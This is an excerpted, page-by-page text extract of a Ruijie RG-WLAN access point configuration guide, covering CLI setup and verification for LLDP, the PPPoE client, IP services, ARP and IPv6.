  • Page 303 Steps Ruijie(config)#interface gigabitethernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)#no lldp tlv-enable dot1-tlv protocol-vlan-id Verification Display LLDP TLV configuration in interface configuration mode. Ruijie(config-if-GigabitEthernet 0/1)#show lldp tlv-config interface gigabitethernet 0/1 LLDP tlv-config of port [GigabitEthernet 0/1] NAME STATUS DEFAULT ------------------------------ ------ ------- Basic optional TLV:...
  • Page 304 Configuration Guide Configuring LLDP LLDP-MED extend TLV: Capabilities TLV Network Policy TLV Location Identification TLV Extended Power via MDI TLV Inventory TLV 5.4.4 Configures the Management Address to Be Advertised Configuration Effect  Configure the management address to be advertised in LLDP packets in interface configuration mode. ...
  • Page 305 Set the management address to 192.168.1.1 on an interface. Steps Ruijie(config)#interface gigabitethernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)#lldp management-address-tlv 192.168.1.1 Verification Display configuration on the interface. Ruijie(config-if-GigabitEthernet 0/1)#show lldp local-information interface GigabitEthernet 0/1 Lldp local-information of port [GigabitEthernet 0/1] Port ID type : Interface name Port id : GigabitEthernet 0/1...
  • Page 306 Configuration Guide Configuring LLDP 802.1 organizationally information Port VLAN ID Port and protocol VLAN ID(PPVID) : 1 PPVID Supported : YES PPVID Enabled : NO VLAN name of VLAN 1 : VLAN0001 Protocol Identity 802.3 organizationally information Auto-negotiation supported : YES Auto-negotiation enabled : YES PMD auto-negotiation advertised...
  • Page 307  Configuring the LLDP Fast Transmission Count Set the LLDP fast transmission count to 5 in global configuration mode. Configuration Steps Ruijie(config)#lldp fast-count 5 Verification Display the global LLDP status information. Ruijie(config)#show lldp status Global status of LLDP : Enable...
  • Page 308 Configuration Guide Configuring LLDP Transmit interval : 30s Hold multiplier Reinit delay : 2s Transmit delay : 2s Notification interval : 5s Fast start counts 5.4.6 Configuring the TTL Multiplier and Transmission Interval Configuration Effect  Configure the TTL multiplier. ...
  • Page 309 Set the TTL multiplier to 3 and the transmission interval to 20 seconds. The TTL of local device information Configuration Steps on neighbors is 61 seconds. Ruijie(config)#lldp hold-multiplier 3 Ruijie(config)#lldp timer tx-interval 20 Verification Display the global LLDP status information. Ruijie(config)#lldp hold-multiplier 3 Ruijie(config)#lldp timer tx-interval 20...
  • Page 310 Configuration Guide Configuring LLDP Reinit delay : 2s Transmit delay : 2s Notification interval : 5s Fast start counts 5.4.7 Configuring the Transmission Delay Configuration Effect  Configure the delay time for LLDP packet transmission. Configuration Steps  Optional.  Perform the configuration in global configuration mode.
  • Page 311 Configuration Example  Configuring the Transmission Delay Set the transmission delay to 3 seconds. Configuration Steps Ruijie(config)#lldp timer tx-delay 3 Verification Display the global LLDP status information. Ruijie(config)#show lldp status Global status of LLDP : Enable Neighbor information last changed time :...
  • Page 312 Configuration Example  Configuring the Initialization Delay Configuration Set the initialization delay to 3 seconds. Steps Ruijie(config)#lldp timer reinit-delay 3 Verification Display the global LLDP status information. Ruijie(config)#show lldp status Global status of LLDP : Enable Neighbor information last changed time :...
  • Page 313 Configuration Guide Configuring LLDP 5.4.9 Configuring the LLDP Trap Function Configuration Effect  Configure the interval for transmitting LLDP Trap messages. Configuration Steps  Enabling the LLDP Trap Function  Optional.  Perform the configuration in interface configuration mode.  Configuring the LLDP Trap Transmission Interval ...
  • Page 314 Enable the LLDP Trap function and set the LLDP Trap transmission interval to 10 seconds. Steps Ruijie(config)#lldp timer notification-interval 10 Ruijie(config)#interface gigabitethernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)#lldp notification remote-change enable Verification Display LLDP status information. Ruijie(config-if-GigabitEthernet 0/1)#show lldp status Global status of LLDP...
  • Page 315 Configuration Guide Configuring LLDP Fast start counts ------------------------------------------------------------ Port [GigabitEthernet 0/1] ------------------------------------------------------------ Port status of LLDP : Enable Port state : UP Port encapsulation : Ethernet II Operational mode : RxAndTx Notification enable : YES Error detect enable : YES Number of neighbors Number of MED neighbors 5.4.10 Configuring the LLDP Error Detection Function...
  • Page 316 Enable the LLDP error detection function on interface GigabitEthernet 0/1. Configuration Steps Ruijie(config)#interface gigabitethernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)#lldp error-detect Verification Display LLDP status information on the interface. Ruijie(config-if-GigabitEthernet 0/1)#show lldp status interface gigabitethernet 0/1 Port [GigabitEthernet 0/1] Port status of LLDP : Enable Port state : UP Port encapsulation...
  • Page 317 The LLDP encapsulation format configuration on a device and its neighbors must be consistent. Configuration Example  Setting the LLDP Encapsulation Format to SNAP Configuration Set the LLDP encapsulation format to SNAP. Steps Ruijie(config)#interface gigabitethernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)#lldp encapsulation snap...
  • Page 318 Configuration Guide Configuring LLDP Verification Display LLDP status information on the interface. Ruijie(config-if-GigabitEthernet 0/1)#show lldp status interface gigabitethernet 0/1 Port [GigabitEthernet 0/1] Port status of LLDP : Enable Port state : UP Port encapsulation : Snap Operational mode : RxAndTx...
  • Page 319 Ruijie(config)#lldp network-policy profile 1 Ruijie(config-lldp-network-policy)# voice vlan 3 cos 4 Ruijie(config-lldp-network-policy)# voice vlan 3 dscp 6 Ruijie(config-lldp-network-policy)#exit Ruijie(config)# interface gigabitethernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)# lldp tlv-enable med-tlv network-policy profile 1 Verification Display the LLDP network policy configuration on the local device. network-policy information:...
  • Page 320 Configuration Guide Configuring LLDP -------------------------- network policy profile :1 voice vlan 3 cos 4 voice vlan 3 dscp 6 5.4.13 Configuring the Civic Address Configuration Effect  Configure the civic address of a device. Configuration Steps  Optional.  Perform this configuration in LLDP Civic Address configuration mode. Verification Display the LLDP civic address of the local device ...
  • Page 321 Configuration Guide Configuring LLDP additional-location-information: Indicates that the CA type is 22. name: Indicates that the CA type is 23. postal-code: Indicates that the CA type is 24. building: Indicates that the CA type is 25. unit: Indicates that the CA type is 26. floor: Indicates that the CA type is 27.
  • Page 322 Configuration Set the address of port GigabitEthernet 0/1 as follows: set country to CH, city to Fuzhou, and postal code to Steps 350000. Ruijie#config Ruijie(config)#lldp location civic-location identifier 1 Ruijie(config-lldp-civic)# country CH Ruijie(config-lldp-civic)# city Fuzhou Ruijie(config-lldp-civic)# postal-code 350000 Verification Display the LLDP civic address of port GigabitEthernet 0/1 1.
  • Page 323 Configuring the Emergency Telephone Number of a Device Configuration Set the emergency telephone number of port GigabitEthernet 0/1 to 085285555556. Steps Ruijie#config Ruijie(config)#lldp location elin identifier 1 elin-location 085283671111 Verification Display the emergency telephone number of port GigabitEthernet 0/1. elin location information: -------------------------...
  • Page 324 Configuration Guide Configuring LLDP 5.5 Monitoring Clearing Running the clear commands may lose vital information and thus interrupt services. Description Command Clears LLDP statistics. clear lldp statistics [ interface interface-name ] Clears LLDP neighbor information. clear lldp table [ interface interface-name ] Displaying Description Command...

  • Page 325: Scenario

    PPPoE: Point-to-point Protocol Over Ethernet Ruijie products support the PPPoE client on Ethernet interfaces, and are therefore able to connect to a host network by accessing a remote hub through a simple access device. The PPPoE protocol enables the PPPoE server to control each access client and perform relevant accounting.
  • Page 326 Configuration Guide Configuring PPPoE Client  The dialup function is enabled on the device. The device connects to a remote Internet service provider (ISP) over an ADSL line, and obtains Internet access capability.  Intranet PCs access the Internet through the device. Figure 6-1 6.2.1.2 Corresponding Protocols ...

  • Page 327: Scenario

    Configuration Guide Configuring PPPoE Client 6.3.1.2 Overview Feature Description Dialup to the Internet In a scenario where Internet access is implemented through the Asymmetric Digital Subscriber Line (ADSL) technology, the device provides dialup and packet forwarding functions. 6.3.2 Dialup to the Internet The device has Internet access capability after the dialup is complete;...
  • Page 328 Configuration Guide Configuring PPPoE Client Packet Forwarding Packet sending process: When a data packet is routed to the dialer interface, the device encapsulates the data packet with the prepared L2 header information and ultimately sends the data packet from a physical port. Packet receiving process: After a packet arrives at a physical port, the device marks the Layer 3 (L3) header position of the packet, executes the next service, and ultimately sends the packet to a host in the intranet.
  • Page 329 Configuration Guide Configuring PPPoE Client Run the no ppp chap hostname command to remove the user name configuration for CHAP authentication. Run the ppp chap password password command to configure the password for CHAP authentication. Run the no ppp chap password command to remove the password configuration for CHAP authentication. Run the ppp pap sent-username username password password command to configure the user name and password for PAH authentication.
  • Page 330 Configuration Guide Configuring PPPoE Client 6.4 Configuration The PPPoE client function is supported only on AP120-W v1.0, AP130-W v1.1 , AP320I v1.x, AP320I v2.X , AP330-I v1.1, AP220-E(P) v2.0, AP520 v1.0, AP630 v1.0, AP5280 v1.0, AP530-I V2 v1.00, APD-M(AC), AP530 v1.0, AP530 v1.5 , AP320-I v1.0, AP320-I v1.1, AP220-E(C) v4.0, AP220-E(M)-V2 v3.0, AP220-E(P) v1.0, AP3220 v1.0, AP320-I v2.0, AP3220-P v1.0, AP4210 v1.0, APD-M v1.0, AP630(IODA) v1.00, AP630(IDA), AP520(DA), APD-M(AC) v1.00 and AP630 v1.00.
  • Page 331 Configuration Guide Configuring PPPoE Client 6.4.1 Configuring Basic Functions of the PPPoE Client 6.4.1.1 Networking Requirements  The device initiates PPPoE negotiation, and completes the negotiation process, protocol keepalive, and protocol termination.  The device obtains Internet access capability after the negotiation is complete, and starts to forward a data flow which is routed to the dialer interface.
  • Page 332 Configuration Guide Configuring PPPoE Client  The configuration is mandatory.  Perform this configuration in logical interface configuration mode.  Associate the logical interface with a specific dialer pool. Configuring the Encapsulation Protocol  The configuration is mandatory.  Perform this configuration in logical interface configuration mode. ...
  • Page 333 Configuration Guide Configuring PPPoE Client Defining a Dialer Triggering Rule  The configuration is mandatory.  Perform this configuration in global configuration mode.  Define a dialer triggering rule. Verification  Check whether the dialer interface has acquired an IP address. ...
  • Page 334 Configuration Guide Configuring PPPoE Client Description subnet-mask: manually configured subnet mask Command Mode Interface configuration mode Configuration If you select negotiate, the IP address of the dialer interface will be acquired through negotiation. Usage If you manually specify the IP address of the dialer interface, the peer's consent is required during negotiation for the device to work properly.
  • Page 335 Configuration Guide Configuring PPPoE Client Command Syntax ppp chap hostname username Parameter username: user name Description Command Mode Interface configuration mode Configuration Usage Configuring the Password for CHAP Authentication Command Syntax ppp chap password password Parameter password: password Description Command Mode Interface configuration mode Configuration Usage...

  • Page 336: Scenario

    Configuration Guide Configuring PPPoE Client In the ADSL scenario, enable the PPPoE client function and access the Internet through an ADSL line. Scenario Figure 6-2 Configuration  Enable the PPPoE client function on the device, and add the interface Gi0/5 to the dialer pool. Steps A# configure terminal A(config)# interface GigabitEthernet 0/5...
  • Page 337 Configuration Guide Configuring PPPoE Client A(config-if)# exit A(config)# access-list 1 permit any A(config)# dialer-list 1 protocol ip permit A(config)# ip nat inside source list 1 interface dialer 1 A(config)# ip route 0.0.0.0 0.0.0.0 dialer 1 A(config)# end Verification Run the show ip interface brief | in dialer 1 command to check whether the dialer interface has acquired an IP address.
  • Page 338 Configuration Guide Configuring PPPoE Client  Intranet hosts cannot access the Internet because NAT configuration is incorrect.  Intranet hosts cannot access the Internet because route configuration is incorrect. 6.5 Monitoring 6.5.1.1 Clearing Various Information If you run the clear pppoe tunnel command while the device is operating, packet forwarding will be interrupted due to tunnel clearance.
  • Page 339 Configuration Guide Configuring PPPoE Client...
  • Page 340 RG-WLAN Series Access Point RGOS Configuration Guide, Release 11.1(5)B8 IP Address & Application Configuration 1. Configuring IP Address and Service 2. Configuring ARP 3. Configuring IPv6 4. Configuring DHCP 5. Configuring DHCPv6 6. Configuring DNS 7. Configuring Network Connectivity Test Tools 8.

  • Page 341: Scenario

    Configuration Guide Configuring IP Addresses and Services 1 Configuring IP Addresses and Services 1.1 Overview Internet Protocol (IP) sends packets to the destination from the source by using logical (or virtual) addresses, namely IP addresses. At the network layer, routers forward packets based on IP addresses. Protocols and Standards ...
  • Page 342 Configuration Guide Configuring IP Addresses and Services  On hosts in the network segment 172.16.1.0/24, set the gateway to 172.16.1.1; on hosts in the network segment 172.16.2.0/24, set the gateway to 172.16.2.1. 1.3 Features Basic Concepts  IP Address An IP address consists of 32 bits in binary. To facilitate writing and description, an IP address is generally expressed in decimal.
  • Page 343 Configuration Guide Configuring IP Addresses and Services For a class D address, the first four most significant bits are 1110 and other bits indicate a multicast address. Figure 1-5 Class Multicast address address The addresses with the first four most significant bits 1111 cannot be assigned. These addresses are called class E addresses and are reserved.
  • Page 344 Broadcast Packet Broadcast packets refer to the packets destined for all hosts on a physical network. Ruijie products support two types of broadcast packets: (1) directed broadcast, which indicates that all hosts on the specified network are packet receivers and the host bits of a destination address are all 1s;...
  • Page 345 Configuring Multiple IP Addresses for an Interface Ruijie products support multiple IP address configuration on one interface, of which one is a primary IP address and the others are secondary IP addresses. Theoretically, the number of secondary IP addresses is not limited. However, secondary IP addresses must belong to different networks and secondary IP addresses must be in different networks from primary IP addresses.
  • Page 346 Configuration Guide Configuring IP Addresses and Services  Obtaining an IP Addresses through PPP Negotiation This command is supported on point-to-point interfaces only. Through this configuration, a point-to-point interface accepts the IP address assigned by the peer end through PPP negotiation.
  • Page 347 Configuration Guide Configuring IP Addresses and Services 1.3.2 Broadcast Packet Processing Working Principle Broadcast is divided into two types. One is limited broadcast, and the IP address is 255.255.255.255. Because the broadcast is prohibited by routers, the broadcast is called local network broadcast. The other is directed broadcast. All host bits are 1s, for example, 192.168.1.255/24.
  • Page 348 Configuration Guide Configuring IP Addresses and Services 1.3.3 Sending ICMP Packets Working Principle  ICMP Protocol Unreachable Message A device receives non-broadcast packets destined for itself, and he packets contain the IP protocol that cannot be processed by the device. The device sends an ICMP protocol unreachable message to the source host. Besides, if the device does not know a route to forward packets, it also sends an ICMP host unreachable message.
  • Page 349 If an IP packet exceeds the IP MTU size, the RGOS software splits the packet. For all devices in the same physical network segment, the IP MTU of interconnected interfaces must be the same. You can adjust the link MTU of interfaces on Ruijie products.
  • Page 350 Working Principle Ruijie products support IP source routes. When a device receives an IP packet, it checks the options such as source route, loose source route, and record route in the IP packet header. These options are detailed in RFC 791. If the device detects that the packet enables one option, it responds;...
  • Page 351 Configuration Guide Configuring IP Addresses and Services 1.4 Configuration The IPv4 functions of Ping and Traceroute are not supported on AP110-W. Configuration Description and Command (Mandatory) It is used to configure an IP address and allow the IP protocol to run on an interface.
  • Page 352 Configuration Guide Configuring IP Addresses and Services 1.4.1 Configuring the IP Addresses of an Interface Configuration Effect Configure the IP address of an interface for communication. Notes  Configuration Steps  Configuring the IP Address of an Interface  Mandatory ...
  • Page 353 A device cannot be cold started through an unnumbered interface. Configuration Example  Configuring an IP Address for an Interface Configuration Configure IP address 192.168.23.110 255.255.255.0 on interface GigabitEthernet 0/0. Steps Ruijie#configure terminal Ruijie(config)#interface gigabitEthernet 0/0 Ruijie(config-if-GigabitEthernet 0/0)# no switchport...
  • Page 354 Configuring IP Addresses and Services Ruijie(config-if-GigabitEthernet 0/0)#ip address 192.168.23.110 255.255.255.0 Verification Run the show ip interface command to check whether the configuration takes effect. Ruijie# show ip interface gigabitEthernet 0/0 GigabitEthernet 0/0 IP interface state is: UP IP interface type is: BROADCAST...
  • Page 355 Configuration Guide Configuring IP Addresses and Services  (Optional) Some old hosts may identify broadcast address 0.0.0.0 only. In this case, set the broadcast address of the target interface to 0.0.0.0.  Perform the configuration in L3 interface configuration mode. ...
  • Page 356 Ruijie(config-if-GigabitEthernet 0/1)# no switchport Ruijie(config-if-GigabitEthernet 0/1)#ip broadcast-address 0.0.0.0 Ruijie(config-if-GigabitEthernet 0/1)#ip directed-broadcast Verification Run the show ip interface command to check whether the configuration takes effect. Ruijie#show running-config interface gigabitEthernet 0/1 ip directed-broadcast ip broadcast-address 0.0.0.0 1.4.3 Configuring ICMP Forwarding Configuration Effect Enable ICMP unreachable messages, ICMP redirection messages, and mask response messages on an interface.
  • Page 357 Configuration Guide Configuring IP Addresses and Services  Perform the configuration in L3 interface configuration mode. Verification Run the show ip interface command to check whether the configuration takes effect. Related Commands  Enabling ICMP Unreachable Messages Command ip unreachables Parameter Description Command...
  • Page 358 Ruijie(config-if-GigabitEthernet 0/1)# ip redirects Ruijie(config-if-GigabitEthernet 0/1)# ip mask-reply Verification Run the show ip interface command to check whether the configuration takes effect. Ruijie#show ip interface gigabitEthernet 0/1 GigabitEthernet 0/1 ICMP mask reply is: ON Send ICMP redirect is: ON Send ICMP unreachabled is: ON 1.4.4 Configuring the Transmission Rate of ICMP Error Packets...
  • Page 359 Configuration Guide Configuring IP Addresses and Services Related Commands  Configuring the Transmission Rate of ICMP Destination Unreachable Packets Triggered by the DF Bit in the IP Header Command ip icmp error-interval DF milliseconds [bucket-size] Parameter milliseconds: Refresh cycle of a token bucket. The value range is from 0 to 2,147,483,647 and the default Description value is 100 milliseconds.
  • Page 360 Set the transmission rate of ICMP destination unreachable packets triggered the DF bit in IP header to 100 Steps packets per second and the transmission rate of other ICMP error packets to 10 packets per second. Ruijie(config)# ip icmp error-interval DF 1000 100 Ruijie(config)# ip icmp error-interval 1000 10 Verification Run the show running-config command to check whether the configuration takes effect.
  • Page 361 Ruijie(config-if-GigabitEthernet 0/1)# no switchport Ruijie(config-if-GigabitEthernet 0/1)#ip mtu 512 Verification Run the show ip interface command to check whether the configuration takes effect. Ruijie# show ip interface gigabitEthernet 0/1 IP interface MTU is: 512 1.4.6 Setting the IP TTL Configuration Effect Modify the IP TTL value of an interface.
  • Page 362  Configuration Set the TTL of unicast packets to 100. Steps Ruijie#configure terminal Ruijie(config)#ip ttl 100 Verification Run the show run-config command to check whether the configuration takes effect. Ruijie#show running-config ip ttl 100 1.4.7 Configuring an IP Source Route Configuration Effect Enable or disable the IP source route function.
  • Page 363 Configuration Guide Configuring IP Addresses and Services Ruijie#configure terminal Ruijie(config)#no ip source-route Verification Run the show run-config command to check whether the configuration takes effect. Ruijie#show running-config no ip source-route 1.4.8 Configuring an IP Address Pool Configuration Effect Assign an IP address to a client through PPP negotiation.
  • Page 364 Configuration Guide Configuring IP Addresses and Services Global configuration mode Command Mode Usage Guide By default, the IP address pool function is enabled. You can configure an IP address pool to assign an IP address to the peer end through PPP negotiation. To disable the IP address pool function, run the no ip address-pool local command.
  • Page 365 Configuration Guide Configuring IP Addresses and Services Ruijie#configure terminal Ruijie(config)# ip address-pool local Ruijie(config)# ip local pool quark 172.16.23.2 172.16.23.255 Ruijie(config)# interface dialer 1 Ruijie(config-if-dialer 1)#peer default ip address pool quark Verification Run the show run-config command to check whether the configuration takes effect.

  • Page 366: Scenario

    Configuration Guide Configuring ARP 2 Configuring ARP 2.1 Overview In a local area network (LAN), each IP network device has two addresses: 1) local address. Since the local address is contained in the header of the data link layer (DLL) frame, it is a DLL address. However, it is processed by the MAC sublayer at the DLL and thereby is usually called the MAC address.

  • Page 367: Scenario

    Configuration Guide Configuring ARP Figure 2-1 Remarks A is a router. B is a switch. It acts as the gateway. C, D, and E are hosts. Deployment  Enable ARP in a LAN to implement IP-MAC mapping. 2.2.2 Proxy ARP-based Transparent Transmission Scenario Transparent transmission across IPv4 LANs is performed.
  • Page 368 Configuration Guide Configuring ARP 2.3 Features Overview Feature Description Static ARP Users can manually specify IP-MAC mapping to prevent the device from learning incorrect ARP entries. ARP Attributes Users can specify the ARP entry timeout, ARP request retransmission times and interval, and maximum number of unresolved ARP entries.
  • Page 369 Configuration Guide Configuring ARP When the ARP timeout is set to a smaller value, the mapping table stored in the ARP cache is more accurate but ARP consumes more network bandwidth.  ARP Request Retransmission Interval and Times The device consecutively sends ARP requests to resolve an IP address to a MAC address. The shorter the retransmission interval is, the faster the resolution is.

  • Page 370: Proxy Arp

    Configuration Guide Configuring ARP 2.3.3 Gratuitous ARP Working Principle Gratuitous ARP packets are a special type of ARP packets. In a gratuitous ARP packet, the source and destination IP addresses are the IP address of the local device. Gratuitous ARP packets have two purposes: IP address conflict detection.
  • Page 371 Configuration Guide Configuring ARP device receives an ARP update packet from the peer end within the aging time, it stores the entry. If not, it deletes the entry. If the corresponding ARP entry exists, NUD is not performed. If the MAC address in the existing dynamic ARP entry is updated, the device also performs NUD. Since this function adds a strict confirmation procedure in the ARP learning process, it affects the efficiency of ARP learning.
  • Page 372 Configuration Guide Configuring ARP Configuration Description and Command (Optional) It is used to detect IP address conflicts and enables peripheral devices to Enabling Gratuitous ARP update ARP entries. arp gratuitous-send interval Enables gratuitous ARP. (Optional) It is used to act as a proxy to reply to ARP requests from the devices in Enabling Proxy ARP different subnets.

  • Page 373: Scenario

    Configuration Configure a static ARP entry on B to statically bind the IP address of A with the MAC address. Steps Ruijie(config)#arp 192.168.23.1 00D0.F822.334B arpa Verification Run the show arp static command to display the static ARP entry. Ruijie(config)#show arp static...
  • Page 374 Configuration Guide Configuring ARP  Optional.  If the network resources are insufficient, it is recommended to set the maximum number of unresolved ARP entries small to reduce the consumption of network bandwidths.  Configure the maximum number of unresolved ARP entries in global configuration mode. ...

  • Page 375: Scenario

    Set the ARP request retransmission times to 4.  Set the maximum number of unresolved ARP entries to 4,096. Ruijie(config)#interface gigabitEthernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)#arp timeout 60 Ruijie(config-if-GigabitEthernet 0/1)#arp cache interface-limit 300 Ruijie(config-if-GigabitEthernet 0/1)#exit Ruijie(config)#arp retry interval 3 Ruijie(config)#arp retry times 4 Ruijie(config)#arp unresolve 4096 ...
  • Page 376 GigabitEthernet 0/7 3600 VLAN 100 3600 VLAN 111 3600 Mgmt 0 3600 Ruijie(config)# show running-config arp unresolve 4096 arp retry times 4 arp retry interval 3 interface GigabitEthernet 0/1 arp cache interface-limit 300 2.4.3 Enabling Gratuitous ARP Configuration Effect The interface periodically sends gratuitous ARP packets.

  • Page 377: Scenario

    Configure the GigabitEthernet 0/0 interface to send a gratuitous ARP packet every 5 seconds. Configuration Steps Ruijie(config-if-GigabitEthernet 0/0)#arp gratuitous-send interval 5 Verification Run the show running-config interface command to check whether the configuration takes effect. Ruijie#sh running-config interface gigabitEthernet 0/0 Building configuration...

  • Page 378: Scenario

    Steps Ruijie(config-if-GigabitEthernet 0/0)#ip proxy-arp Verification Run the show ip interface command to check whether the configuration takes effect. Ruijie#show ip interface gigabitEthernet 0/0 GigabitEthernet 0/0 IP interface state is: DOWN IP interface type is: BROADCAST IP interface MTU is: 1500...
  • Page 379 Configuration Guide Configuring ARP TTL invalid packet number: 0 ICMP packet input number: 0 Echo request Echo reply Unreachable Source quench Routing redirect 2.4.5 Enabling ARP Trustworthiness Detection Configuration Effect Enable ARP trustworthiness detection. If the device receiving an ARP request packet fails to find the corresponding entry, it performs NUD.

  • Page 380: Scenario

    Enable ARP trustworthiness detection on port GigabitEthernet 0/0. Steps Ruijie(config-if-GigabitEthernet 0/0)#arp trust-monitor enable Verification Run the show running-config interface command to check whether the configuration takes effect. Ruijie#show running-config interface gigabitEthernet 0/0 Building configuration... Current configuration : 184 bytes interface GigabitEthernet 0/0 duplex auto speed auto ip address 30.1.1.1 255.255.255.0...

  • Page 381: Scenario

    Disable dynamic ARP entry learning on port GigabitEthernet 0/0. Steps Ruijie(config-if-GigabitEthernet 0/0)#no arp-learning enable Verification Run the show running-config interface command to check whether the configuration takes effect. Ruijie#sh running-config interface gigabitEthernet 0/0 Building configuration... Current configuration : 127 bytes interface GigabitEthernet 0/0 duplex auto speed auto ip address 30.1.1.1 255.255.255.0...
  • Page 382 Configuration Guide Configuring ARP Clears dynamic ARP entries. In clear arp-cache gateway authentication mode, dynamic ARP entries in authentication VLANs are not cleared. Displaying Description Command Displays the ARP table. show ip arp Displays the ARP entry counter. show arp counter Displays the timeout of dynamic ARP show arp timeout entries.
  • Page 383 Configuration Guide Configuring IPv6 3 Configuring IPv6 3.1 Overview As the Internet develops rapidly and IPv4 address space is becoming exhausted, IPv4 limitations become more and more obvious. At present, many researches and practices on Internet Protocol Next Generation (IPng) have been conducted. The IPng working group of the Internet Engineering Task Force (IETF) has formulated an IPng protocol named IP Version 6 (IPv6), which is described in RFC 2460.

  • Page 384: Scenario

    Configuration Guide Configuring IPv6 (ESP). AH provides data integrity and authenticates IP packet sources to ensure that the packets originate from the nodes identified by the source addresses. ESP provides data encryption to realize end-to-end encryption.  Better QoS Support A new field in the IPv6 packet header defines how to identify and process data streams.
  • Page 385 Configuration Guide Configuring IPv6 Deployment Hosts can use the stateless address auto-configuration or DHCPv6 address assignment mode. After addresses are configured, hosts can communicate with each other using IPv6 addresses. 3.3 Features Overview Feature Description IPv6 Address The IPv6 address format makes IPv6 have a larger address space and flexible representation Format approach.
  • Page 386 Configuration Guide Configuring IPv6 1080:0:0:0:8:800:200C:417A These integers are hexadecimal, where A to F represent 10 to 15. Each integer in the address must be represented, except the leading zeros in each integer. If an IPv6 address contains a string of zeros (as shown in the second and third examples above), a double colon (::) can be used to represent these zeros.
  • Page 387 Configuration Guide Configuring IPv6 Unicast addresses fall into five types: unspecified address, loopback address, link-local address, site-local address, and global unicast address. At present, site-local addresses have been abolished. Except unspecified, loopback, and link-local addresses, all other addresses are global unicast addresses. ...

  • Page 388: Scenario

    Configuration Guide Configuring IPv6 Among global unicast addresses, there is a type of IPv4-embedded IPv6 addresses, including IPv4-compatible IPv6 addresses and IPv4-mapped IPv6 addresses. They are used for interconnection between IPv4 nodes and IPv6 nodes. The format of an IPv4-compatible IPv6 address is as follows: Figure 3-5 The format of an IPv4-mapped IPv6 address is as follows: Figure 3-6...
  • Page 389 Configuration Guide Configuring IPv6  Group ID field The group ID consists of 112 bits to identify a multicast group. A multicast ID can represent different groups based on the flag and scope fields. IPv6 multicast addresses are prefixed with FF00::/8. One IPv6 multicast address usually identifies interfaces on a series of different nodes.
  • Page 390 Configuration Guide Configuring IPv6 Related Configuration  Configuring an IPv6 Address  No IPv6 address is configured on interfaces by default.  Run the ipv6 address command to configure the IPv6 unicast address and anycast address of an interface.  After an interface goes up, it will automatically join the corresponding multicast group.
  • Page 391 Configuration Guide Configuring IPv6  Payload Length This field consists of 16 bits, including the packet payload length and the length of IPv6 extended options (if available). That is, it includes the IPv6 packet length except the IPv6 packet header. ...
  • Page 392 Configuration Guide Configuring IPv6 3.3.4 IPv6 PMTUD Similar to IPv4 Path MTU Discovery (PMTUD), IPv6 PMTUD allows a host to dynamically discover and adjust the MTU size on the data Tx path. If the length of a data packet to be sent by a host is greater than the PMTU, the host performs packet fragmentation on its own.
  • Page 393 Configuration Guide Configuring IPv6 the NS packet, that is, the link-layer address of the solicited node. After receiving this NA packet, the source node can communicate with the destination node. Figure 3-11 shows the address resolution process. Figure 3-11  If the reachable time of a neighbor has elapsed but an IPv6 unicast packet needs to be sent to it, the device performs NUD.
  • Page 394 Configuration Guide Configuring IPv6  One or multiple IPv6 address prefixes (used for on-link determination or stateless address auto-configuration)  Validity of the IPv6 address prefix  Host auto-configuration method (stateful or stateless)  Default device information (whether the device acts as the default device; if yes, the interval for acting as the default device is also included.) ...
  • Page 395 Configuration Guide Configuring IPv6  You can configure the maximum number of ND options to prevent forged ND packets from carrying unlimited ND options and occupying excessive CPU space on the device.  Maximum Number of Neighbor Learning Entries on an Interface ...
  • Page 396 Configuration Guide Configuring IPv6  By default, an IPv6 interface does not send RA packets.  Run the no ipv6 nd suppress-ra command in interface configuration mode to disable RA suppression.  Configuring the Maximum Number of Unresolved ND Entries ...
  • Page 397 Configuration Guide Configuring IPv6 One byte One byte One byte One byte Extended Route type Remaining Next header header length segments Reserved Address 1 Address N The following example describes the application of the Type 0 routing header, as shown in Figure 3-15. Figure 3-15 Host 1 sends Host 2 a packet specifying the intermediate nodes Router 2 and Router 3.
  • Page 398 Configuration Guide Configuring IPv6 Host 2 No change The forwarding process is as follows: Host 1 sends a packet in which the destination address is Router 2's address 1001::1, the Type 0 routing header is filled with Router 3's address 1002::1 and Host 2's address 1003::2, and the value of the Segments Left field is 2. Router 1 forwards this packet to Router 2.
  • Page 399 PMTUD. Therefore, it is recommended to restrict the sending rate of ICMPv6 Packet Too Big messages independently of other ICMPv6 error messages. Although ICMPv6 Redirect packets are not ICMPv6 error messages, Ruijie recommends restricting their rates together with ICMPv6 error messages except Packet Too Big messages.
  • Page 400 Configuration Guide Configuring IPv6 3.4 Configuration Configuration Description and Command (Mandatory) It is used to configure IPv6 addresses and enable IPv6. Configuring IPv6 ipv6 enable Enables IPv6 on an interface. Address Configures the IPv6 unicast address of an interface. ipv6 address (Optional) It is used to enable IPv6 redirection on an interface.
  • Page 401 Configuration Guide Configuring IPv6 3.4.1 Configuring an IPv6 Address Configuration Effect Configure the IPv6 address of an interface to implement IPv6 network communication. Configuration Steps  Enabling IPv6 on an Interface  (Optional) If you do not want to enable IPv6 by configuring an IPv6 address, run the ipv6 enable command. ...
  • Page 402 Ruijie(config-if-GigabitEthernet 0/0)#ipv6 address 2000::1/64 Verification Run the show ipv6 interface command to verify that an address is successfully added to the GigabitEthernet 0/0 interface. Ruijie(config-if-GigabitEthernet 0/0)#show ipv6 interface gigabitEthernet 0/0 interface GigabitEthernet 0/0 is Down, ifindex: 1, vrf_id 0 address(es): Mac Address: 00:00:00:00:00:00...
  • Page 403 Configuration Guide Configuring IPv6 3.4.2 Configuring IPv6 NDP Configuration Effect Configure NDP-related attributes, for example, enable IPv6 redirection and DAD. Notes RA suppression is enabled on interfaces by default. To configure a device to send RA packets, run the no ipv6 nd suppress-ra command in interface configuration mode.
  • Page 404 Configuration Guide Configuring IPv6  Optional.  If the number of IPv6 hosts is controllable, run the ipv6 nd cache interface-limit command to restrict the number of neighbors learned on an interface. This prevents ND learning attacks from occupying the memory space and affecting device performance.
  • Page 405 Configuration Guide Configuring IPv6 Mode Usage Guide A device detects unreachable neighbors based on the configured reachable time. The shorter the configured reachable time, the faster the device detects unreachable neighbors but the more it consumes network bandwidth and device resources. Therefore, it is not recommended to set this time too small.
